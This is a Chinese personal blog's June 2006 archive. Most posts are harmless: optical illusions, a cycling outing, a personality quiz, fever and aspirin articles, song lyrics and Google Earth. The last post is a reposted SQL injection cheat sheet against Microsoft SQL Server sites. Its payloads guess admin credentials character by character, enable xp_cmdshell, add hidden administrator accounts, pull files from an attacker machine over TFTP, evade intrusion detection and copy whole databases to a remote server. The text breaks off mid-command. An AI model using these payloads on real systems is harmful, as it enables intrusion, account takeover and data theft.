Monthly Archives: 六月 2006

奇图,看眼睛如何欺骗大脑的(转)

柱子是圆的还是方的?

狮子在哪里?

据说能看见9张脸的智商有一百八十


那个女人是真实的还是拼图里的?

请专注中间那个黑点,发现了什么?

有几个黑点?

十二个人还是十三个人?

注视着中心的点,头与其距离拉近和离远。

是静的还是动的

眼一定要聚精会神地盯着中央的十字看,你会发现,周围紫色的圆点
一定要聚精会神地盯着中央的十字看,你会发现,周围紫色的圆点渐渐淡下来,甚至消失。最后只剩下一个绿色的圆点在那里转!
真的很神奇啊“`PS:一定要聚精会神

雷达山——自行车的好去处

今日本打算和广州自行车俱乐部周日(6月25日)增城-从化骑车休闲之旅的不等闲等人一起去增城的。昨晚都准备好了,谁晚上蚊子太多没睡好,直到早上五点才点了蚊香后才睡了个好觉,可是一觉醒来已经八点多了,来不及了。起来洗嗽完,还是决定去赶上去。沿着广源快速路四十多分钟后九点十分左右到了天河客运站,继续沿着广汕路向增城方向。后来看一位全副武装的车友,感觉像是和我一样目的的。就打了个招呼,果然是一路的,决定同行。可是没几分钟后他的前轮暴了,找了个修车的地方花了二十来分钟才修好。打了人电话决定取消追赶了,我们就近去了雷达山。
坡度太大,后来快到山顶还没到我们因车子问题及天气以及体能问题就下来了。我车子不太好,慢慢下去的。这位车友车速竟达到59km/h发生的了意外受了点伤。所以还是要注意安全,安全第一。之后我们一起在一个风景不错的水库旁吃了个饭,就回来了。









做了一个心理测试,挺有意思的

我的结果:
1.愿望:保密
2. – 马 – 绵羊 – 老虎 – 母牛 – 猪-
3. – 狗 (忠诚)- 猫(可爱) – 老鼠(不好) – 咖啡(苦涩而有味) – 海(宽广)
4. – 黄色 – 橘红色 – 红色 – 白色 – 绿色 (因为一张充满绿色的照片面想到)其它的暂时都想不到对应的人

很邪门的心理测试,不过有高达98%的准确率,不信试试!

很邪门的心理测试,不过有高达98%的准确率,不信试试!很诡异喔!! 我已经试过了,很准,真的很准,至少很符合我现在的情况,同志们,来做下吧~~~~

人格测验 : 每一个人只能够许一个愿望 ...... 试试看 , 可是千万不要作弊 , 不要先看结论 !

你会对你的答案感到非常讶异 . 我们的脑海就像是一个降落伞一样 ;当它在於开放的状态下就能够达到更好的运作 . 这是非常有趣的 ,但是你必须百分之百的遵守所有的指示 . 千万不要作弊哦!~~~   

*** 在开始本测验之前请先许一个愿望吧***   
注意 ! 请依照顺序来回答本问卷 .一共只有4个问题 ,但是如果你在回答之前先偷看了结论 ,你就无法得到真正诚实的答案 .   现在请慢慢的阅读并且回答 . 不要事先偷看 请准备笔和纸来写下你的答案 . 在於问卷的最後你将会须要它来解读你的人格这是一个非常诚实的问卷 ,它将会告诉你许多关於你 真正的自我 的事情 .   

*************************************************************   
请将以下的5种动物 , 依你对它们喜爱的顺序排列: - 母牛 - 老虎 - 绵羊 - 马 - 猪- 

*************************************************************   
请在於以下的每一句话之後写出一个你对於它所感觉的形容词 : - 狗 - 猫 - 老鼠 - 咖啡 - 海   

*************************************************************   
请想一些人 (这一些人必须认识你 ,   并且对你来说是非常重要的人)   请将这一些人与以下的颜色联想在一起   (不要重复名称或颜色)   每一个人只能和一个颜色联想而已 . - 黄色 - 橘红色 - 红色 - 白色 - 绿色   

*************************************************************   
最後 , 请写下你的幸运号码以及一个星期中你最喜欢的日子

*************************************************************   
你已经写好了吗 ? 请确定你所写出的答案是你内心真正的感受 这是你最後的机会来作出任何的更改. 现在请看以下的解说 :但是在阅读之前请再度许下你之前所许的愿望 .   下面是答案哦,准备好了没有啊?? 
。。

。。

。。

。。

。。

发烧发热怎么办与百年良药阿司匹林

现在竟然药店买不到“阿司匹林”,都是利益惹的。因为阿司匹林相对来说实在是太便宜了,药店一般都不买,据说医院一般也不开这个药。

突然发烧发热怎么办 

突然发烧发热,不要害怕,不要胡思乱想,思想负担不要过重。对于大多数疾病来说,早发现、早治疗是减少危害、避免因就诊不及时出现并发症的有效措施。 

身边如果出现了发热病人,要马上为他测量体温,当遇到发热并伴随呼吸困难的病人时,最好双方都戴上12层以上的棉纱布口罩,并迅速拨打120或自行及时将病人送往医院。 

医院有着很好的隔离措施,将使用最好的检测手段对发热病人进行筛查,每位发烧病人都是单人单间,发烧门诊的病人将使用专门的机器进行拍片等必要检查。北京的医院尤其是传染病医院一刻都没有放松过警惕,防护措施一应俱全,在做必要的检查期间,病人留在医院是最安全的。 

什么病可引起发烧 

实际上,引起发烧的疾病有很多,大致可分为三类,一是感染性疾病,包括病毒、细菌、原虫、立克次体等八种病原体引起的感染,几乎所有的感染性疾病都会引起发热,比如感冒、艾滋病、疟疾、流脑、SARS等。二是肿瘤引起的发热,尤其是晚期肿瘤会出现发热症状。三是自身免疫性疾病比如红斑狼疮等也会引起发热。 

发低烧怎么办 

高烧与低烧,一般说来,高于38.5℃的为高烧病人,低于38.5℃为低烧病人。出现低烧应该先补充液体,如菜汁、花茶等。有条件的话可以用湿冷毛巾冷敷全身,或者以海绵擦拭全身,泡温水澡等。期间注意增减衣服,不宜过多,以利散热,但也不可太少以免寒冷。医生提示,饮食后三十分钟再测量体温较为准确。即使只是发低烧最好也去发烧门诊看病,在临床上,常常可见一些习惯于自我诊断的病人贻误了最佳治疗时机,甚至付出生命的代价。 

遇到高烧病人我们该怎么办 

1、城区居民 北京市疾病预防控制中心设有24小时热线电话64287788,倘若出现发烧症状,市民可拨打电话进行咨询,若发烧症状没有缓解,请呼叫120急救车,或将病人送往最近的发烧门诊进行详细检查。 

2、郊区居民 可前往该区县指定发烧门诊就诊,若情况比较严重,可呼叫当地的急救机构。 

3、建筑工地 有关部门要求建筑工地实行规范化管理,改善民工条件,取消大通铺,此外,要求建筑工地建立发烧观察室,倘若民工出现发烧症状,先由发烧观察室进行初步排查,情况严重者必须呼叫120急救车或自行送往发热门诊就诊。 

4、学校、幼儿园 首先要建立晨检制度并严格执行,学生出现发烧症状,先由校医院或医务室大夫进行排查,对体温达到或超过37.5℃并有传染病可疑症状的学生,联系120急救中心用专用车辆送往指定医院就诊。 

突然发烧怎么办 

在传染病的流行期间要改善家庭及周边环境的卫生状况,培养良好的个人卫生习惯,要正确地、适度地、有针对性地采取消毒措施。预防性地采取消毒措施。预防性服药必须在专业医务人员的指导下进行。不要盲目地道听途说,以免因乱服药导致不良反应。 

进入秋冬,每个人都应该注意关注天气预报和有关流感的动态报告,即使有流感流行的可能,市民也不必过分紧张,只要及时注射流感疫苗,加强身体锻炼,增强机体抵抗力,在天气变化时注意防寒保暖,同时在10月到第二年3月份的流感流行期间做好重点预防、消毒和隔离工作,就能够减轻流感的危害。 

接种流感疫苗是防治流感最经济、最有效、最安全和最方便的措施,世界卫生组织已经向全世界倡议今年秋冬最好注射流感疫苗。其主要目的是为了和非典区分。实践证明,流感疫苗可以显著降低由流感造成的门诊率和住院率,减少流感造成的并发症和死亡率,此外,提前注射流感疫苗,除了可以预防流感外,还有助于其他高烧疾病的防治。 

 

《北京晚报》

慎用退烧药 

    退烧药只能暂时解除发热、疼痛等症状,不能消除病因,也不能缩短病程,因而是一种对症治疗药物。这些药物如应用不当,可破坏机体的抗病能力,掩盖某些疾病的主要症状,给诊断造成困难,甚至贻误病情,导致不良后果。故对一般发热者不必急于用解热药,应尽快明确诊断。
    有下列情况可考虑用退烧药:1、发热过高(39℃以上),危及生命,特别是小儿出现高热惊厥时。 2、热度虽然不高,但伴有明显头痛、肌肉痛、失眠、意识障碍,影响到了患者的休息和疾病恢复。3、持续高热已危害心肺功能,或对高热不能耐受。 4、患有某些疾病长期发热,控制不够理想时,如血吸虫病、丝虫病、伤寒结核以及癌症发热等。
    在药物的选择方面,应根据患者的综合因素考虑选用。常用药及用药方法如下:
    (1)、一般以疗效确切、毒性低、价格便宜的药物,如阿司匹林及其复方制剂为首选,疗程不应超过一周。
    (2)、39℃以下的发热,可选用中草药,如柴胡、板蓝根、大青叶、金银花、黄连、鸭趾草等配合使用,副作用少,对病毒性感染尤为适用。
    (3)、儿科用药,最好仅限于阿司匹林、对乙酰氨基酚及它们的复方制剂。
    (4)、妊娠妇女应慎用解热镇痛药,最好仅选用对乙酰氨基酚,但不能过量。
    (5)、含氨基比林、非那西丁和安替比林成分的复方制剂,应尽量少用,更不能长期使用。
    用药注意事项:①对服用后曾发生过敏反应或粒细胞减少者,不宜再用。②小儿体温易波动,高热时可发生惊厥,可同时适当用镇静剂。③使用复方制剂时应了解其成分,以免盲目使用重复使用而增加不良反应。④此类药物限服3日,如症状未解应及时向医生咨询。

感冒患者日渐增多,少数人甚至出现了发烧的症状。有些患者一发现体温升高,就会服用一些退烧药,认为出上一身汗,病也就好了。 

    这样做至少有3个弊端。首先,发热本是人体的保护性反应。发热时,体内抗体生成增多,白细胞吞噬作用和肝脏的解毒功能增强,有利于机体消灭入侵的病原体。此时若盲目服用退烧药,反而会影响疾病痊愈。 

    其次,多种疾病均可引起发热。发低烧可能只是感冒的症状,但若长期在午后发低烧,则可能是结核病的征兆。去年非典期间,确有些患者因为盲目服用退烧药而耽误了治疗。因此,从方便医生及时确诊的角度来看,患者也不宜过早服用退烧药。 

    第三,有些解热镇痛药还可能引起不良反应。 

    因此,患者发热后不宜过早服用退烧药,如体温不超过38℃,还可以观察一段时间,如体温较高,特别是超过39℃,应首先去医院就诊,明确病因后再用药。 

    需要强调的是,小儿体温过高时容易出现惊厥,因此要采取更为积极的措施,如果体温超过38.5℃,即可采用酒精擦浴或外敷冰袋的方法进行降温,以防不测。(王振宇)

非阿司匹林退烧药会导致女性高血压

   据美联社上午报道,最新研究显示:女性服用非阿司匹林类解热镇痛药———比如对乙酰氨基酚(也叫醋安酚、乙酰氨基酚、扑热息痛、退热净),会面临高血压的危险。中国市场常见的退烧药百服宁、泰诺林、必理通等的主要成分都是对乙酰氨基酚。布洛芬、萘普生等药也有类似风险。

  研究发现,比起不用这些镇痛药的人来,服药者在3年内患高血压的危险可能加倍。其他的非阿司匹林类常用镇痛药则早已被发现与高血压有关。需要人们警惕的是,这些镇痛药大都是非处方药,是人们最为常用的。

  此前的研究曾认为,醋安酚是惟一的非类固醇抗炎镇痛药之外的镇痛药,一般不会导致高血压,是常用镇痛药中相对比较安全的。但最新研究却发现,女性服用醋安酚之后,患上高血压的危险会加倍。服用非类固醇镇痛药对女性的危险同样较大。美国休斯敦一位心脏病专家说:“如果你服用了较大剂量的非处方镇痛药,一定要告诉你的医生,检查一下你的血压。”

  综合起来看,阿司匹林仍然是目前最安全的镇痛药。人们早已熟知,它可以降低患心脏病的风险。上述研究是哈佛大学医学研究生院与波士顿一家女子医院共同进行的。这项研究动用了5123名没有高血压史的妇女参加医学实验

专家提醒:抗生素不是退烧药更不是万能药 

天津的一位刘先生发烧3个月,吃了十几种抗菌药物都没起作用,医生让他把所有的药都停了,发烧很快好了。医学专家提醒,抗生素不是退烧药,它的作用只是抑制和杀死细菌。而引起发烧的原因很多,不一定就是细菌感染。乱用抗生素不但没有效果,反而可能有害。

  天津医科大学总医院感染免疫科主任巩路介绍,发热不等于感染,感染确实常伴有或表现为发热,但并非所有发热病人都有感染。即使是因为感染而引起的发热也不一定必须服用抗生素,因为感染常见的病因除了细菌以外,还可由病毒所致,抗生素对病毒是没有任何作用的。不正确甚至盲目使用抗菌药物,不注意机体的免疫状况,会使病情变得更复杂,既浪费了人力、财力,还会给病人增加痛苦。

百年阿斯匹林
 
 

阿斯匹林从发明至今已有百年的历史,在这100年里,它从一个治疗头痛的药物,直至被飞往月球的“太阳神十号”作为急救药品之一。人们不断地发现阿斯匹林的新效用,它因此被称为“神奇药”。 

  
  阿斯匹林的发明起源于随处可见的柳树。在中国和西方,人们自古以来就知道柳树皮具有解热镇痛的神奇功效,在缺医少药的年代里,人们常常将它作为治疗发烧的廉价“良药”,在许多偏远的地方,当产妇生育时,人们也往往让她咀嚼柳树皮,作为镇痛的药物。 

  
  人们一直无法知道柳树皮里究竟含有什么物质,以致于具有这样神奇的功效,直至1800年,人们才从柳树皮中提炼出了具有解热镇痛作用的有效成分――水杨酸,由此解开这个千年之谜。1898年,德国化学家霍夫曼用水杨酸与醋酐反应,合成了乙酰水杨酸,1899年,德国拜耳药厂正式生产这种药品,取商品名为Aspirin,这就是医院里最常用的药物――阿斯匹林。 

  
  今年10月4日,阿斯匹林在美国国家历史博物馆占上了一席。这里的25万件展品都反映了科技的进步,例如人造心脏、听诊器等。在这里,德国拜耳的美国分公司捐出有阿斯匹林主要成份乙酰水杨酸的样本和拜耳在1899年制造首批药品的复制品。 

  
  阿斯匹林一经问世就风靡世界,成为最常用的药物之一,发现阿斯匹林作用的1982年诺贝尔奖得主文尼说,全世界每年要消耗45000吨阿斯匹林。阿斯匹林具有十分广泛的用途,其最基本的药理作用是解热镇痛,通过发汗增加散热作用,从而达到降温目的。同时,它可以有效地控制由炎症、手术等引起的慢性疼痛,如头痛、牙痛、神经痛、肌肉痛等,且不会产生药物依赖性。阿斯匹林的另一个重要作用是抗炎、抗风湿,是治疗风湿热、风湿性关节炎的首选药物。 

  
  近年来,随着医学科学的发展,阿斯匹林越来越多的新用途被逐步发现。如由中英科学家组织发起的,有37个国家近千家医院参加的大规模临床试验证实,阿斯匹林治疗急性缺血性中风(即脑梗塞)具有肯定疗效,从而使阿斯匹林成为众多治疗缺血性中风的药物中,被证实有效且能全面推广使用的药物。这一成果表明,缺血性中风患者在发作期服用2至4周阿斯匹林,即可使死亡率或中风复发率下降11%。研究已证实,阿斯匹林对于多种血管阴塞性疾病,具有良好的预防作用。科学家曾在80年代后期,通过大规模临床证实,阿斯匹林对治疗急性心肌梗塞疗效显著。 

  
  此外,美国纽约圣卢克斯-罗斯福医院中心的一项研究表明,阿斯匹林和降低胆固醇的药物“斯塔丁”并用,可降低患结肠癌的危险。该研究中心对1.5万名心脏病患者进行了3次研究。所获得的数据表明,这两种常见药同时使用,能杀死早期的癌细胞。美国密歇根州的研究人员还发现,阿斯匹林可防止一些廉价抗生素造成的耳聋。对天竺鼠的实验显示,阿斯匹林中的基本成分Salieylate可防止内耳毛细胞受损。 

  
  阿斯匹林这一百年老药的新用途仍在不断地被发现,被人类所应用。阿斯匹临床上可用来治疗胆道蛔虫病;阿斯匹林则可抑制前列腺素的产生而降低肠癌的发生率;对长有肠息肉的人,服用阿斯匹林,则可以预防息肉癌变;临床上,阿斯匹林还可用于治疗脚癣、偏头痛、糖尿病、老年性白内障、妊娠高血压、老年性痴呆、下肢静脉曲张引起的溃疡等。 

  
  难怪阿斯匹林最早的生产商拜耳公司主席巴克马说,服食两粒阿司匹林和叫醒我差不多成为美国的传统。虽然这药品已有100年的历史,但它在今时今日仍在发挥作用。 

歌曲《1937》-张穆庭

今天在访问一家公司网站时,发现有个背景音乐,竟然用的是mp3的,等了好长时间才下完。不过歌听起来感觉不错,是我喜欢的类型。所以就细细的听了一下,再在百度上搜了一下几句歌词,找到了歌名。下载后发一份存在这里。

1937
词/曲  张穆庭

一扁舟 桥下轻滑过
老船工 道尽长江愁
多年后 旧地寻访踪
人去楼空 意悠悠

枫桥过 但见雨花楼
渡江口 伤痛泣诉说
墙垛破 遍地满疮孔
化归尘烟 雨水落

这些年 我哭过一夜又一夜
旧相片 我翻过一页又一页
闭上眼 想起你的从前
这世界 已离我太遥远

一转眼 场景又染红一整片
望着天 唤不回曾经的誓言
说再见 短短的一瞬间
闭上眼 幸福只剩残缺
(music)
这些年 我哭过一夜又一夜
旧相片 我翻过一页又一页
闭上眼 想起你的从前
这世界 已离我太遥远

一转眼 场景又染红一整片
望着天 唤不回曾经的誓言
说再见 短短的一瞬间
闭上眼 幸福只剩残缺
(music)
一扁舟 桥下轻滑过
老船工 道尽长江愁
多年后 旧地寻访踪
人去楼空 意悠悠


本地下载:http://blog.dscao.com/blog/upload/1937.mp3
2006/9/24 :今天发现这首歌还有历史意义, 相关文章:
九一八,被淡忘的纪念

“大学生为母亲康复而跪地求助”?

晚上和朋友一起出去吃完回来,给另一位朋友带了一份打包的回去。刚出餐馆有一群人围着,我们也过去凑一下热闹。原来是一“大学生”跪在地上,头低得能看见后劲部,而看不到面部。前面地上摆放着他跑地的目的及相关证明。我也没细看,感觉以前“今日一线”报道过不少这样的情况,只要是真的都有很大帮助,但如果是骗局一般也不会有好下场。我就随手掏出了相机,拍了一张,因为天已经很黑了,用了闪光灯。我也就只拍了一张立马走人,怕万一是团伙在骗人我可就惨了。还好我安全回到了家。准备打今日一线报一下,看看能不能给他有所帮助,在这里跪着一个星期估计也乞讨不到七百块钱。可是今日一线的电话太忙了,一直占线。我们就准备去溜冰去。再次经过那里,没了,那人不在了。像是什么也没发生过一样,才不到十分钟的时间。让我们感觉这像是个骗局多一点,也许是因为我的闪光灯影响了他。
以下是我拍到的图片:


有兴趣的朋友可以通过他的求助信分析一下,这是真的还是假的?
如果是真的,希望他的母亲能尽快享受到合理的治疗,早日康复!
如果是假的,那真是太不值得了,真没什么好说的了。

Google地球可以见到我家

这两天同事在研究google地球,说公司的写字楼看得很清楚,连会所的游泳池都能一眼认出来。我也凑上去看了一下。哇,真是很清楚哦,几个月前我也看过,不过那时的广州区只能识别出珠江和上面的几座桥,好像没什么建筑物的感觉,也许那时的地图是n年以前的吧。尽然现在这样清楚。
昨天晚上我也重新下载了一份,在上面看看,找到安徽,好几个小块状区域,也有清晰地图了。竟然发现我家所在的城市也有高清地图,城市很小,经济也不是很好。google怎么就会有提供这里清晰地图呢,有点不敢相信。不过顺着公路从市区找到了我家,连院子和屋顶都能认出来。不过地图上的建筑格局应该是两三年前的,因为去年新建的一些房子还没有出现。

google地球下载地址:http://earth.google.com
实景:

桂冲水库:

两黄点位置拍摄的相片

最标准的SQL注入语句

1.判断有无注入点
; and 1=1 and 1=2
2.猜表一般的表的名称无非是admin adminuser user pass password 等..
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) —判断是否存在admin这张表
3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个 and 0<(select count(*) from admin) and 1<(select count(*) from admin) 4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称. and 1=(select count(*) from admin where len(*)>0)–
and 1=(select count(*) from admin where len(用户字段名称name)>0)
and 1=(select count(*) from admin where len(_blank>密码字段名称password)>0)
5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止
and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6) 错误
and 1=(select count(*) from admin where len(name)>5) 正确 长度是6
and 1=(select count(*) from admin where len(name)=6) 正确
and 1=(select count(*) from admin where len(password)>11) 正确
and 1=(select count(*) from admin where len(password)>12) 错误 长度是12
and 1=(select count(*) from admin where len(password)=12) 正确
6.猜解字符
and 1=(select count(*) from admin where left(name,1)=a) —猜解用户帐号的第一位
and 1=(select count(*) from admin where left(name,2)=ab)—猜解用户帐号的第二位
就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) —
这个查询语句可以猜解中文的用户和_blank>密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.
group by users.id having 1=1–
group by users.id, users.username, users.password, users.privs having 1=1–
; insert into users values( 666, attacker, foobar, 0xffff )–
UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS
WHERE TABLE_blank>_NAME=logintable-
UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS
WHERE TABLE_blank>_NAME=logintable WHERE COLUMN_blank>_NAME NOT IN (login_blank
>_id)-
UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS
WHERE TABLE_blank>_NAME=logintable WHERE COLUMN_blank>_NAME NOT IN (login_blank
>_id,login_blank>_name)-
UNION SELECT TOP 1 login_blank>_name FROM logintable-
UNION SELECT TOP 1 password FROM logintable where login_blank>_name=Rahul–
看_blank>服务器打的补丁=出错了打了SP4补丁
and 1=(select @@VERSION)–
看_blank>数据库连接账号的权限,返回正常,证明是_blank>服务器角色sysadmin权限。
and 1=(SELECT IS_blank>_SRVROLEMEMBER(sysadmin))–
判断连接_blank>数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA)
and sa=(SELECT System_blank>_user)–
and user_blank>_name()=dbo–
and 0<>(select user_blank>_name()–
看xp_blank>_cmdshell是否删除
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_
blank>_cmdshell)–
xp_blank>_cmdshell被删除,恢复,支持绝对路径的恢复
;EXEC master.dbo.sp_blank>_addextendedproc xp_blank>_cmdshell,xplog70.dll–
;EXEC master.dbo.sp_blank>_addextendedproc xp_blank>_cmdshell,c:\inetpub\wwwroot\
xplog70.dll–
反向PING自己实验
;use master;declare @s int;exec sp_blank>_oacreate “wscript.shell”,@s out;exec sp_blank>
_oamethod @s,”run”,NULL,”cmd.exe /c ping 192.168.0.1″;–
加帐号
;DECLARE @shell INT EXEC SP_blank>_OACREATE wscript.shell,@shell OUTPUT EXEC SP_blank>
_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$Content$nbsp;1866574 /add–
创建一个虚拟目录E盘:
;declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o,
run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w “默认Web站点” -v “e”,”e:\”–
访问属性:(配合写入一个webshell)
declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o,
run, NULL, cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse
爆库 特殊_blank>技巧::%5c=\ 或者把/和\ 修改%5提交
and 0<>(select top 1 paths from newtable)–
得到库名(从1到5都是系统的id,6以上才可以判断)
and 1=(select name from master.dbo.sysdatabases where dbid=7)–
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
依次提交 dbid = 7,8,9…. 得到更多的_blank>数据库名
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) 暴到一个表 假设为 admin
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in (Admin))
来得到其他的表。
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin
and uid>(str(id))) 暴到UID的数值假设为18779569 uid=id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一个admin的一个
字段,假设为 user_blank>_id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in
(id,…)) 来暴出其他的字段
and 0<(select user_blank>_id from BBS.dbo.admin where username>1) 可以得到用户名
依次可以得到_blank>密码。。。。。假设存在user_blank>_id username ,password 等字段
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) 得到表名
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in(Address))
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin and uid>(s
tr(id))) 判断id值
and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access也好用)
得到WEB路径
;create table [dbo].[swap] ([swappass][char](255));–
and (select top 1 swappass from swap)=1–
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_blank>_regread @rootkey=HKEY_blank>_LOCAL_blank>_MACHINE,
@key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\, @value_blank
>_name=/, values=@test OUTPUT insert into paths(path) values(@test)–
;use ku1;–
;create table cmd (str image);– 建立image类型的表cmd
存在xp_blank>_cmdshell的测试过程:
;exec master..xp_blank>_cmdshell dir
;exec master.dbo.sp_blank>_addlogin jiaoniang$;– 加SQL帐号
;exec master.dbo.sp_blank>_password null,jiaoniang$,1866574;–
;exec master.dbo.sp_blank>_addsrvrolemember jiaoniang$Content$nbsp;sysadmin;–
;exec master.dbo.xp_blank>_cmdshell net user jiaoniang$Content$nbsp;1866574 /workstations:* /
times:all /passwordchg:yes /passwordreq:yes /active:yes /add;–
;exec master.dbo.xp_blank>_cmdshell net localgroup administrators jiaoniang$Content$nbsp;/add;–
exec master..xp_blank>_servicecontrol start, schedule 启动_blank>服务
exec master..xp_blank>_servicecontrol start, server
; DECLARE @shell INT EXEC SP_blank>_OACREATE wscript.shell,@shell OUTPUT EXEC SP
_blank>_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaonian
g$Content$nbsp;1866574 /add
;DECLARE @shell INT EXEC SP_blank>_OACREATE wscript.shell,@shell OUTPUT EXEC S
P_blank>_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net localgroup
administrators jiaoniang$Content$nbsp;/add
; exec master..xp_blank>_cmdshell tftp -i youip get file.exe– 利用TFTP上传文件
;declare @a sysname set @a=xp_blank>_+cmdshell exec @a dir c:\
;declare @a sysname set @a=xp+_blank>_cm’+’dshell exec @a dir c:\
;declare @a;set @a=db_blank>_name();backup database @a to disk=你的IP你的共享目录
bak.dat 如果被限制则可以。
select * from openrowset(_blank>sqloledb,server;sa;,select OK! exec master.dbo.sp_
blank>_addlogin hax)
查询构造:
SELECT * FROM news WHERE id=… AND topic=… AND …..
adminand 1=(select count(*) from [user] where username=victim and right(left(userp
ass,01),1)=1) and userpass <>
select 123;–
;use master;–
:a or name like fff%;– 显示有一个叫ffff的用户哈。
and 1<>(select count(email) from [user]);–
;update [users] set email=(select top 1 name from sysobjects where xtype=u and
status>0) where name=ffff;–
;update [users] set email=(select top 1 id from sysobjects where xtype=u and nam
e=ad) where name=ffff;–
;update [users] set email=(select top 1 name from sysobjects where xtype=u and i
d>581577110) where name=ffff;–
;update [users] set email=(select top 1 count(id) from password) where name=ffff;–
;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;–
;update [users] set email=(select top 1 name from password where id=2) where name=ffff;–
上面的语句是得到_blank>数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。
通过查看ffff的用户资料可得第一个用表叫ad
然后根据表名ad得到这个表的ID 得到第二个表的名字
insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x
73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)–
insert into users values( 667,123,123,0xffff)–
insert into users values ( 123, admin–, password, 0xffff)–
;and user>0
;and (select count(*) from sysobjects)>0
;and (select count(*) from mysysobjects)>0 //为access_blank>数据库
枚举出数据表名
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);–
这是将第一个表名更新到aaa的字段处。
读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>刚才得到的表名)。
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0
and name<>vote);–
然后id=1552 and exists(select * from aaa where aaa>5)
读出第二个表,一个个的读出,直到没有为止。
读字段是这样:
;update aaa set aaa=(select top 1 col_blank>_name(object_blank>_id(表名),1));–
然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
;update aaa set aaa=(select top 1 col_blank>_name(object_blank>_id(表名),2));–
然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]
update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0
[ and name<>你得到的表名 查出一个加一个]) [ where 条件] select top 1 name from sysobje
cts where xtype=u and status>0 and name not in(table1,table2,…)
通过SQLSERVER注入_blank>漏洞建_blank>数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]
[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名]
update 表名 set 字段=(select top 1 col_blank>_name(object_blank>_id(要查询的数据表名),
字段列如:1) [ where 条件]
绕过IDS的检测[使用变量]
;declare @a sysname set @a=xp_blank>_+cmdshell exec @a dir c:\
;declare @a sysname set @a=xp+_blank>_cm’+’dshell exec @a dir c:\
1、 开启远程_blank>数据库
基本语法
select * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select *
from table1 )
参数: (1) OLEDB Provider name
2、 其中连接字符串参数可以是任何端口用来连接,比如
select * from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address
=192.168.0.1,1433;, select * from table
3.复制目标主机的整个_blank>数据库insert所有远程表到本地表。
基本语法:
insert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select *
from table1) select * from table2
这行语句将目标主机上table2表中的所有数据复制到远程_blank>数据库中的table1表中。实际运用
中适当修改连接字符串的IP地址和端口,指向需要的地方,比如:
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address
=192.168.0.1,1433;,select * from table1) select * from table2
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address
=192.168.0.1,1433;,select * from _blank>_sysdatabases)
select * from master.dbo.sysdatabases
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address
=192.168.0.1,1433;,select * from _blank>_sysobjects)
select * from user_blank>_database.dbo.sysobjects
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address
=192.168.0.1,1433;,select * from _blank>_syscolumns)
select * from user_blank>_database.dbo.syscolumns
复制_blank>数据库:
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address
=192.168.0.1,1433;,select * from table1) select * from database..table1
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Addres
